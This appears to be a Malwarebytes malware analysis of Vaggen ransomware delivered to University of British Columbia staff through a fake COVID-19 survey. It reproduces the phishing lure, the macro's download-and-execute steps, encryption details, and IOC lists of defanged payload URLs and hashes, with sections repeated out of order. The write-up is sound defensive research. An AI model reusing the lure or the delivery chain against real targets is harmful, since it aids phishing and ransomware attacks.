3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 653 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 654 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 655 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 656 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 657 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 658 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 659 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 660 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 661 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 662 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 663 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 664 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 665 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 666 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 667 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 668 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 669 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 670 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 671 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 672 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 673 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 674 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 675 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 676 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 677 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 678 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 679 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 680 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 681 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 682 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 683 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people 